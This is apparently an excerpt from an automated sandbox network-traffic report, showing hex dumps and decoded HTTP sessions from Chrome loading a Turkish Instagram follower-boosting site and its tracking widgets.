                    Data Ascii: an, section.head p {color: white !important;}section.head p a:not(.btn) {color: aqua;}.descriptionBlock {display: block;text-align: left;background: white;-webkit-box-shadow: 0px 0px 16px 0px rgba(50, 50, 50, 0.4);
                    2024-05-26 22:58:13 UTC1369INData Raw: 33 2c 20 37 39 2c 20 30 2e 31 29 3b 20 2f 2a 20 53 61 6d 65 20 63 6f 6c 6f 72 20 61 73 20 74 68 65 20 6c 65 66 74 20 62 6f 72 64 65 72 20 77 69 74 68 20 72 65 64 75 63 65 64 20 61 6c 70 68 61 20 74 6f 20 30 2e 31 20 2a 2f 0d 0a 7d 0d 0a 0d 0a 2e 64 61 6e 67 65 72 20 73 74 72 6f 6e 67 20 7b 0d 0a 20 20 63 6f 6c 6f 72 3a 20 20 23 64 39 35 33 34 66 3b 0d 0a 7d 0d 0a 0d 0a 2e 77 61 72 6e 69 6e 67 20 7b 0d 0a 20 20 62 6f 72 64 65 72 2d 6c 65 66 74 2d 63 6f 6c 6f 72 3a 20 23 66 30 61 64 34 65 3b 0d 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 72 67 62 61 28 32 34 30 2c 20 31 37 33 2c 20 37 38 2c 20 30 2e 31 29 3b 0d 0a 7d 0d 0a 0d 0a 2e 77 61 72 6e 69 6e 67 20 73 74 72 6f 6e 67 20 7b 0d 0a 20 20 63 6f 6c 6f 72 3a 20 23 66 30 61 64 34 65 3b 0d
                    Data Ascii: 3, 79, 0.1); /* Same color as the left border with reduced alpha to 0.1 */}.danger strong { color: #d9534f;}.warning { border-left-color: #f0ad4e; background-color: rgba(240, 173, 78, 0.1);}.warning strong { color: #f0ad4e;
                    2024-05-26 22:58:13 UTC1369INData Raw: 70 3e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0a 3c 64 69 76 20 61 72 69 61 2d 6d 75 6c 74 69 73 65 6c 65 63 74 61 62 6c 65 3d 22 74 72 75 65 22 20 63 6c 61 73 73 3d 22 70 61 6e 65 6c 2d 67 72 6f 75 70 22 20 72 6f 6c 65 3d 22 74 61 62 6c 69 73 74 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 61 6e 65 6c 20 70 61 6e 65 6c 2d 63 6f 6c 6c 61 70 73 65 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 61 6e 65 6c 2d 68 65 61 64 69 6e 67 22 20 69 64 3d 22 68 65 61 64 69 6e 67 31 22 20 72 6f 6c 65 3d 22 74 61 62 22 3e 0a 3c 68 34 20 63 6c 61 73 73 3d 22 70 61 6e 65 6c 2d 74 69 74 6c 65 22 3e 3c 61 20 61 72 69 61 2d 63 6f 6e
                    Data Ascii: p></p></div></div><div class="container"><div class="row"><div aria-multiselectable="true" class="panel-group" role="tablist"><div class="panel panel-collapse"><div class="panel-heading" id="heading1" role="tab"><h4 class="panel-title"><a aria-con
                    2024-05-26 22:58:13 UTC1369INData Raw: 72 69 61 2d 65 78 70 61 6e 64 65 64 3d 22 66 61 6c 73 65 22 20 63 6c 61 73 73 3d 22 63 6f 6c 6c 61 70 73 65 64 22 20 64 61 74 61 2d 70 61 72 65 6e 74 3d 22 23 61 63 63 6f 72 64 69 6f 6e 22 20 64 61 74 61 2d 74 6f 67 67 6c 65 3d 22 63 6f 6c 6c 61 70 73 65 22 20 68 72 65 66 3d 22 23 54 61 6b 69 70 63 69 48 69 6c 65 73 69 22 3e 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 70 6c 75 73 22 3e 3c 2f 69 3e 20 3c 2f 61 3e 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 38 30 30 30 30 30 3b 22 3e 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 22 3e 3c 73 74 72 6f 6e 67 3e c4 b0 6e 73 74 61 67 72 61 6d 20 42 65 c4 9f 65 6e 69 20 48 69 6c 65 73 69 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e
                    Data Ascii: ria-expanded="false" class="collapsed" data-parent="#accordion" data-toggle="collapse" href="#TakipciHilesi"><i class="fa fa-plus"></i> </a><span style="color:#800000;"><span style="font-size:22px;"><strong>nstagram Beeni Hilesi</strong></span></span>
                    2024-05-26 22:58:13 UTC1369INData Raw: 65 6e 69 6e 64 65 20 65 6e 20 6b 6f 6c 61 79 20 79 6f 6c 75 20 67 c3 b6 6e 64 65 72 69 6c 65 72 69 6e 69 7a 69 6e 20 61 6c 74 c4 b1 6e 64 61 6b 69 20 79 6f 72 75 6d 6c 61 72 64 c4 b1 72 2e 47 c3 b6 6e 64 65 72 69 6c 65 72 69 6e 69 7a 69 6e 20 61 6c 74 c4 b1 6e 64 61 20 6e 65 20 6b 61 64 61 72 20 c3 a7 6f 6b 20 79 6f 72 75 6d 20 76 61 72 73 61 20 6b 65 c5 9f 66 65 74 65 20 c3 a7 c4 b1 6b 6d 61 20 6f 72 61 6e c4 b1 6e c4 b1 7a 20 69 6e 73 61 6e 6c 61 72 c4 b1 6e 20 73 69 7a 69 20 74 61 6e c4 b1 6d 61 20 6f 72 61 6e c4 b1 20 6f 20 6b 61 64 61 72 20 61 72 74 61 72 2e 53 69 74 65 6d 69 7a 64 65 20 62 75 6c 75 6e 61 6e 20 c3 bc 63 72 65 74 73 69 7a 20 79 6f 72 75 6d 20 68 69 6c 65 73 69 6e 69 20 6b 75 6c 6c 61 6e 61 72 61 6b 20 67 c3 b6 6e 64 65 72 69 6c 65 72
                    Data Ascii: eninde en kolay yolu gnderilerinizin altndaki yorumlardr.Gnderilerinizin altnda ne kadar ok yorum varsa kefete kma orannz insanlarn sizi tanma oran o kadar artar.Sitemizde bulunan cretsiz yorum hilesini kullanarak gnderiler
                    2024-05-26 22:58:13 UTC1369INData Raw: 72 65 74 73 69 7a 64 69 72 2e 20 4b 72 65 64 69 20 73 61 74 c4 b1 6e 20 61 6c 6d 61 64 c4 b1 6b c3 a7 61 20 68 69 c3 a7 62 69 72 20 c3 bc 63 72 65 74 20 c3 b6 64 65 6d 65 7a 73 69 6e 69 7a 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6d 64 2d 33 22 3e 0a 3c 68 35 3e 42 69 7a 65 20 55 6c 61 c5 9f c4 b1 6e 3c 2f 68 35 3e 0a 3c 70 3e 48 65 72 20 74 c3 bc 72 6c c3 bc 20 73 6f 72 75 20 76 65 20 67 c3 b6 72 c3 bc c5 9f 6c 65 72 69 6e 69 7a 20 69 c3 a7 69 6e 0a 3c 61 20 68 72 65 66 3d 22 23 6d 6f 64 61 6c 43 6f 6e 74 61 63 74 22 20 64 61 74 61 2d 74 6f 67 67 6c 65 3d 22 6d 6f 64 61 6c 22 3e c4 b0 6c 65 74 69 c5 9f 69 6d 3c 2f 61 3e 0a 6b 61 6e 61 6c 6c 61 72 c4 b1 6d c4 b1 7a 64 61 6e 20 62 69 7a 69 6d 6c 65 20 69 72 74
                    Data Ascii: retsizdir. Kredi satn almadka hibir cret demezsiniz.</p></div><div class="col-md-3"><h5>Bize Ulan</h5><p>Her trl soru ve grleriniz iin<a href="#modalContact" data-toggle="modal">letiim</a>kanallarmzdan bizimle irt
                    2024-05-26 22:58:13 UTC1369INData Raw: 09 69 5b 72 5d 20 3d 20 69 5b 72 5d 20 7c 7c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 09 09 09 09 09 28 69 5b 72 5d 2e 71 20 3d 20 69 5b 72 5d 2e 71 20 7c 7c 20 5b 5d 29 2e 70 75 73 68 28 61 72 67 75 6d 65 6e 74 73 29 0a 09 09 09 09 7d 2c 20 69 5b 72 5d 2e 6c 20 3d 20 31 20 2a 20 6e 65 77 20 44 61 74 65 28 29 3b 0a 09 09 09 09 61 20 3d 20 73 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 6f 29 2c 0a 09 09 09 09 09 6d 20 3d 20 73 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 6f 29 5b 30 5d 3b 0a 09 09 09 09 61 2e 61 73 79 6e 63 20 3d 20 31 3b 0a 09 09 09 09 61 2e 73 72 63 20 3d 20 67 3b 0a 09 09 09 09 6d 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 61 2c 20 6d 29 0a 09 09 09 7d 29 28 77 69 6e 64 6f 77 2c
                    Data Ascii: i[r] = i[r] || function () {(i[r].q = i[r].q || []).push(arguments)}, i[r].l = 1 * new Date();a = s.createElement(o),m = s.getElementsByTagName(o)[0];a.async = 1;a.src = g;m.parentNode.insertBefore(a, m)})(window,


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    66192.168.2.549834104.21.27.834433788C:\Program Files\Google\Chrome\Application\chrome.exe
                    TimestampBytes transferredDirectionData
                    2024-05-26 22:58:13 UTC785OUTGET /assets/logo/logo.png HTTP/1.1
                    Host: anatakip.com
                    Connection: keep-alive
                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                    sec-ch-ua-mobile: ?0
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                    sec-ch-ua-platform: "Windows"
                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                    Sec-Fetch-Site: same-origin
                    Sec-Fetch-Mode: no-cors
                    Sec-Fetch-Dest: image
                    Referer: https://anatakip.com/
                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-US,en;q=0.9
                    Cookie: df22fd5cb3c2d86bdf715369b47b4428=bf7e3d95e99bd43927c4807425b30e01; _gid=GA1.2.1885107992.1716764258; _ga_T1K5FR27Q6=GS1.1.1716764274.1.1.1716764287.0.0.0; _ga=GA1.2.1095029423.1716764258
                    2024-05-26 22:58:14 UTC740INHTTP/1.1 404 Not Found
                    Date: Sun, 26 May 2024 22:58:14 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: close
                    expires: Thu, 19 Nov 1981 08:52:00 GMT
                    cache-control: no-store, no-cache, must-revalidate
                    pragma: no-cache
                    vary: Accept-Encoding
                    x-turbo-charged-by: LiteSpeed
                    CF-Cache-Status: BYPASS
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oOnLUFKADVc9RRJ7P1Dc37zdS4AJ7Ly3awDvpdwQx7NqMpCCwjn6BJxqk%2FSN4UuNZiGhn9anpEp4%2BkIvTRgkqnuNPdkxEMemlbl5%2FJwwxpzngHXCIZ2VsZOSb2InOAk%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 88a15e655d750cbd-EWR
                    alt-svc: h3=":443"; ma=86400
                    2024-05-26 22:58:14 UTC629INData Raw: 31 63 37 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 74 72 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 61 73 73 65 74 73 2f 62 6f 6f 74 73 74 72 61 70 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2d 70 61
                    Data Ascii: 1c76<!DOCTYPE html><html lang="tr"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="stylesheet" href="/assets/bootstrap/css/bootstrap-pa
                    2024-05-26 22:58:14 UTC1369INData Raw: 73 74 79 6c 65 2f 70 61 70 65 72 2e 63 73 73 3f 76 3d 76 33 2e 31 2e 35 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 61 73 73 65 74 73 2f 6e 70 72 6f 67 72 65 73 73 2f 6e 70 72 6f 67 72 65 73 73 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 61 73 73 65 74 73 2f 6c 6f 67 6f 2f 66 61 76 69 63 6f 6e 2e 70 6e 67 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 20 7c 20 41 6e 61 54 61 6b 69 70 20 6b 65 6e 64 69 6e 69 7a 69 20 69 6e 73 74 61 67 72 61 6d 20 65 6e 20 69 79 69 20 70 72 6f 66 69 6c 69 20 68 61 6c 69 6e 65 20 67 65 74 69 72 69 6e 20 2c
                    Data Ascii: style/paper.css?v=v3.1.5"><link rel="stylesheet" href="/assets/nprogress/nprogress.css"><link rel="shortcut icon" href="/assets/logo/favicon.png" type="image/x-icon" /><title>Page Not Found | AnaTakip kendinizi instagram en iyi profili haline getirin ,
                    2024-05-26 22:58:14 UTC1369INData Raw: 6c 6c 61 70 73 65 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 3d 22 66 61 6c 73 65 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 73 72 2d 6f 6e 6c 79 22 3e 54 6f 67 67 6c 65 20 6e 61 76 69 67 61 74 69 6f 6e 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 69 63 6f 6e 2d 62 61 72 22 3e 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 69 63 6f 6e 2d 62 61 72 22 3e 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 69 63 6f 6e 2d 62 61 72 22 3e 3c 2f 73 70 61 6e 3e 0a 3c 2f 62 75 74 74 6f 6e 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 61 76 62 61 72 2d 63 6f 6c 6c 61 70 73 65 20 63 6f 6c 6c 61 70 73 65 20 6e 61 76 62 61 72 2d 6c 65 66 74 22 3e 0a 3c 75 6c 20 63 6c 61 73 73 3d 22 6e 61 76 20 6e
                    Data Ascii: llapse" aria-expanded="false"><span class="sr-only">Toggle navigation</span><span class="icon-bar"></span><span class="icon-bar"></span><span class="icon-bar"></span></button></div><div class="navbar-collapse collapse navbar-left"><ul class="nav n
                    2024-05-26 22:58:14 UTC1369INData Raw: 35 3e 4b 69 6d 6c 65 72 20 4b 75 6c 6c 61 6e 61 62 69 6c 69 72 3c 2f 68 35 3e 0a 3c 70 3e 49 6e 73 74 61 67 72 61 6d 20 c3 bc 79 65 6c 69 c4 9f 69 20 6f 6c 61 6e 20 68 65 72 6b 65 73 20 73 69 73 74 65 6d 69 20 6b 75 6c 6c 61 6e 61 62 69 6c 69 72 2e 20 49 6e 73 74 61 67 72 61 6d 20 68 65 73 61 62 c4 b1 6e c4 b1 7a 6c 61 20 67 69 72 69 c5 9f 20 79 61 70 c4 b1 6e 20 76 65 20 68 65 6d 65 6e 20 6b 75 6c 6c 61 6e 6d 61 79 61 20 62 61 c5 9f 6c 61 79 c4 b1 6e 2e 20 4b 75 6c 6c 61 6e c4 b1 6d 20 c3 bc 63 72 65 74 73 69 7a 64 69 72 2e 20 4b 72 65 64 69 20 73 61 74 c4 b1 6e 20 61 6c 6d 61 64 c4 b1 6b c3 a7 61 20 68 69 c3 a7 62 69 72 20 c3 bc 63 72 65 74 20 c3 b6 64 65 6d 65 7a 73 69 6e 69 7a 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22
                    Data Ascii: 5>Kimler Kullanabilir</h5><p>Instagram yelii olan herkes sistemi kullanabilir. Instagram hesabnzla giri yapn ve hemen kullanmaya balayn. Kullanm cretsizdir. Kredi satn almadka hibir cret demezsiniz.</p></div><div class="
                    2024-05-26 22:58:14 UTC1369INData Raw: 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 61 73 73 65 74 73 2f 63 6f 72 65 2f 63 6f 72 65 2e 6a 73 3f 76 3d 33 2e 31 2e 31 30 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 09 09 09 09 09 09 28 66 75 6e 63 74 69 6f 6e 20 28 69 2c 20 73 2c 20 6f 2c 20 67 2c 20 72 2c 20 61 2c 20 6d 29 20 7b 0a 09 09 09 09 69 5b 27 47 6f 6f 67 6c 65 41 6e 61 6c 79 74 69 63 73 4f 62 6a 65 63 74 27 5d 20 3d 20 72 3b 0a 09 09 09 09 69 5b 72 5d 20 3d 20 69 5b 72 5d 20 7c 7c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 09 09 09 09 09 28 69 5b 72 5d 2e 71 20 3d 20 69 5b 72 5d 2e 71 20 7c 7c 20 5b 5d 29 2e 70 75 73 68 28 61 72 67 75 6d 65 6e 74 73 29 0a 09 09 09 09 7d 2c 20 69 5b 72 5d 2e 6c
                    Data Ascii: ><script src="/assets/core/core.js?v=3.1.10"></script><script type="text/javascript">(function (i, s, o, g, r, a, m) {i['GoogleAnalyticsObject'] = r;i[r] = i[r] || function () {(i[r].q = i[r].q || []).push(arguments)}, i[r].l


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    67192.168.2.549837104.22.75.1714433788C:\Program Files\Google\Chrome\Application\chrome.exe
                    TimestampBytes transferredDirectionData
                    2024-05-26 22:58:14 UTC589OUTGET /widget/instamark.png HTTP/1.1
                    Host: whos.amung.us
                    Connection: keep-alive
                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                    sec-ch-ua-mobile: ?0
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                    sec-ch-ua-platform: "Windows"
                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                    Sec-Fetch-Site: cross-site
                    Sec-Fetch-Mode: no-cors
                    Sec-Fetch-Dest: image
                    Referer: https://anatakip.com/
                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-US,en;q=0.9
                    2024-05-26 22:58:14 UTC373INHTTP/1.1 307 Temporary Redirect
                    Date: Sun, 26 May 2024 22:58:14 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: close
                    cache-control: no-cache, no-store, must-revalidate
                    location: https://widgets.amung.us/classic/14/1402.png
                    CF-Cache-Status: DYNAMIC
                    Server: cloudflare
                    CF-RAY: 88a15e6ac933c35a-EWR
                    alt-svc: h3=":443"; ma=86400
                    2024-05-26 22:58:14 UTC5INData Raw: 30 0d 0a 0d 0a
                    Data Ascii: 0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    68192.168.2.549839104.22.74.1714433788C:\Program Files\Google\Chrome\Application\chrome.exe
                    TimestampBytes transferredDirectionData
                    2024-05-26 22:58:15 UTC591OUTGET /classic/14/1402.png HTTP/1.1
                    Host: widgets.amung.us
                    Connection: keep-alive
                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                    sec-ch-ua-mobile: ?0
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                    sec-ch-ua-platform: "Windows"
                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                    Sec-Fetch-Site: cross-site
                    Sec-Fetch-Mode: no-cors
                    Sec-Fetch-Dest: image
                    Referer: https://anatakip.com/
                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-US,en;q=0.9
                    2024-05-26 22:58:16 UTC432INHTTP/1.1 200 OK
                    Date: Sun, 26 May 2024 22:58:16 GMT
                    Content-Type: image/png
                    Content-Length: 1692
                    Connection: close
                    last-modified: Sun, 13 Jun 2010 09:03:11 GMT
                    etag: "4c149ecf-69c"
                    expires: Wed, 15 May 2024 19:27:10 GMT
                    Cache-Control: max-age=2678400
                    access-control-allow-origin: *
                    alt-svc: h3=":443"; ma=86400
                    CF-Cache-Status: HIT
                    Age: 1049466
                    Accept-Ranges: bytes
                    Server: cloudflare
                    CF-RAY: 88a15e722c9e729b-EWR
                    2024-05-26 22:58:16 UTC937INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 51 00 00 00 1d 08 03 00 00 00 e5 cb 70 13 00 00 02 d3 50 4c 54 45 ff ff ff d2 d2 d2 c6 c6 c6 ac ac ac e3 e3 e3 c8 c8 c8 bc bc bc bb bb bb e7 e7 e7 b9 b9 b9 88 88 88 b7 b7 b7 74 74 74 e4 e4 e4 ae ae ae c9 c9 c9 8e 8e 8e 99 99 99 d6 d6 d6 ea ea ea 80 80 80 95 95 95 d3 d3 d3 e9 e9 e9 7a 7a 7a d1 d1 d1 e1 e1 e1 c7 c7 c7 76 76 76 72 72 72 e2 e2 e2 90 90 90 92 92 92 93 93 93 a5 a5 a5 ad ad ad aa aa aa a8 a8 a8 a6 a6 a6 a4 a4 a4 8d 8d 8d e8 e8 e8 a2 a2 a2 d0 d0 d0 70 70 70 cf cf cf a0 a0 a0 ff ff ff 5c 5c 5c 28 28 28 0c 0c 0c 35 35 35 c1 27 2d 08 08 08 30 30 30 05 05 05 02 02 02 45 45 45 38 38 38 10 10 10 2d 2d 2d 41 41 41 51 51 51 3d 3d 3d 7d 27 2a 68 24 27 58 58 58 b6 26 2c 88 37 3b 7f 37 3b 52 4a 4a 8c
                    Data Ascii: PNGIHDRQpPLTEtttzzzvvvrrrppp\\\(((555'-000EEE888---AAAQQQ===}'*h$'XXX&,7;7;RJJ
                    2024-05-26 22:58:16 UTC755INData Raw: 3c 41 b2 f1 44 a0 20 75 ce 28 94 9c f4 39 0a b9 79 83 ff 44 83 36 15 36 c4 69 ff 35 52 7d d2 c9 ac fc f1 2f dd ce a7 9c ff 9f e2 a3 a4 fa 94 03 4d fa ee 3a fa ed 8f 37 f8 ea a8 d5 cb da d3 51 5f af 22 5e 8a 9a 5b ad d6 66 3c 36 b3 5a 9b 6b d7 95 ed a3 24 b8 2f 1e 8f 3f f7 da df cc e6 78 9c 95 17 e7 c7 35 62 0f 80 ee f1 7a ba 83 c8 4a 3a 40 8f b4 a6 90 86 31 8d 27 7e e1 f9 6b 94 ec f2 4a 8a b2 ed 1f e6 a3 4f be 7f 93 87 d9 43 14 c6 6f b1 e4 41 37 a5 1e 4b 7b 5e da 5b fc b8 36 01 bf 92 07 79 7a 52 94 13 d5 f8 1e ab 0f aa 63 6f 33 db 55 55 fd 86 a7 db 93 55 c6 6c f1 a9 60 56 13 99 21 4b 35 f9 54 d5 f2 20 db 65 e1 2e eb 3e 23 a9 6a 11 be 47 f7 a9 b3 b1 5f 6e a0 97 63 6b 63 31 2d de 58 17 33 40 d7 58 a2 76 6d b1 99 63 1c 78 59 e4 72 c0 8b ab 28 52 22 1f 94 4b
                    Data Ascii: <AD u(9yD66i5R}/M:7Q_"^[f<6Zk$/?x5bzJ:@1'~kJOCoA7K{^[6yzRco3UUUl`V!K5T e.>#jG_nckc1-X3@XvmcxYr(R"K


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    69192.168.2.549840104.22.75.1714433788C:\Program Files\Google\Chrome\Application\chrome.exe
                    TimestampBytes transferredDirectionData
                    2024-05-26 22:58:15 UTC589OUTGET /widget/anatakipx.png HTTP/1.1
                    Host: whos.amung.us
                    Connection: keep-alive
                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                    sec-ch-ua-mobile: ?0
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                    sec-ch-ua-platform: "Windows"
                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                    Sec-Fetch-Site: cross-site
                    Sec-Fetch-Mode: no-cors
                    Sec-Fetch-Dest: image
                    Referer: https://anatakip.com/
                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-US,en;q=0.9
                    2024-05-26 22:58:16 UTC371INHTTP/1.1 307 Temporary Redirect
                    Date: Sun, 26 May 2024 22:58:16 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: close
                    cache-control: no-cache, no-store, must-revalidate
                    location: https://widgets.amung.us/classic/00/53.png
                    CF-Cache-Status: DYNAMIC
                    Server: cloudflare
                    CF-RAY: 88a15e723e121982-EWR
                    alt-svc: h3=":443"; ma=86400
                    2024-05-26 22:58:16 UTC5INData Raw: 30 0d 0a 0d 0a
                    Data Ascii: 0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    70192.168.2.549841104.22.74.1714433788C:\Program Files\Google\Chrome\Application\chrome.exe
                    TimestampBytes transferredDirectionData
                    2024-05-26 22:58:16 UTC359OUTGET /classic/14/1402.png HTTP/1.1
                    Host: widgets.amung.us
                    Connection: keep-alive
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                    Accept: */*
                    Sec-Fetch-Site: none
                    Sec-Fetch-Mode: cors
                    Sec-Fetch-Dest: empty
                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-US,en;q=0.9
                    2024-05-26 22:58:16 UTC432INHTTP/1.1 200 OK
                    Date: Sun, 26 May 2024 22:58:16 GMT
                    Content-Type: image/png
                    Content-Length: 1692
                    Connection: close
                    last-modified: Sun, 13 Jun 2010 09:03:11 GMT
                    etag: "4c149ecf-69c"
                    expires: Wed, 15 May 2024 19:27:10 GMT
                    Cache-Control: max-age=2678400
                    access-control-allow-origin: *
                    alt-svc: h3=":443"; ma=86400
                    CF-Cache-Status: HIT
                    Age: 1049466
                    Accept-Ranges: bytes
                    Server: cloudflare
                    CF-RAY: 88a15e770fffc448-EWR
                    2024-05-26 22:58:16 UTC937INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 51 00 00 00 1d 08 03 00 00 00 e5 cb 70 13 00 00 02 d3 50 4c 54 45 ff ff ff d2 d2 d2 c6 c6 c6 ac ac ac e3 e3 e3 c8 c8 c8 bc bc bc bb bb bb e7 e7 e7 b9 b9 b9 88 88 88 b7 b7 b7 74 74 74 e4 e4 e4 ae ae ae c9 c9 c9 8e 8e 8e 99 99 99 d6 d6 d6 ea ea ea 80 80 80 95 95 95 d3 d3 d3 e9 e9 e9 7a 7a 7a d1 d1 d1 e1 e1 e1 c7 c7 c7 76 76 76 72 72 72 e2 e2 e2 90 90 90 92 92 92 93 93 93 a5 a5 a5 ad ad ad aa aa aa a8 a8 a8 a6 a6 a6 a4 a4 a4 8d 8d 8d e8 e8 e8 a2 a2 a2 d0 d0 d0 70 70 70 cf cf cf a0 a0 a0 ff ff ff 5c 5c 5c 28 28 28 0c 0c 0c 35 35 35 c1 27 2d 08 08 08 30 30 30 05 05 05 02 02 02 45 45 45 38 38 38 10 10 10 2d 2d 2d 41 41 41 51 51 51 3d 3d 3d 7d 27 2a 68 24 27 58 58 58 b6 26 2c 88 37 3b 7f 37 3b 52 4a 4a 8c
                    Data Ascii: PNGIHDRQpPLTEtttzzzvvvrrrppp\\\(((555'-000EEE888---AAAQQQ===}'*h$'XXX&,7;7;RJJ
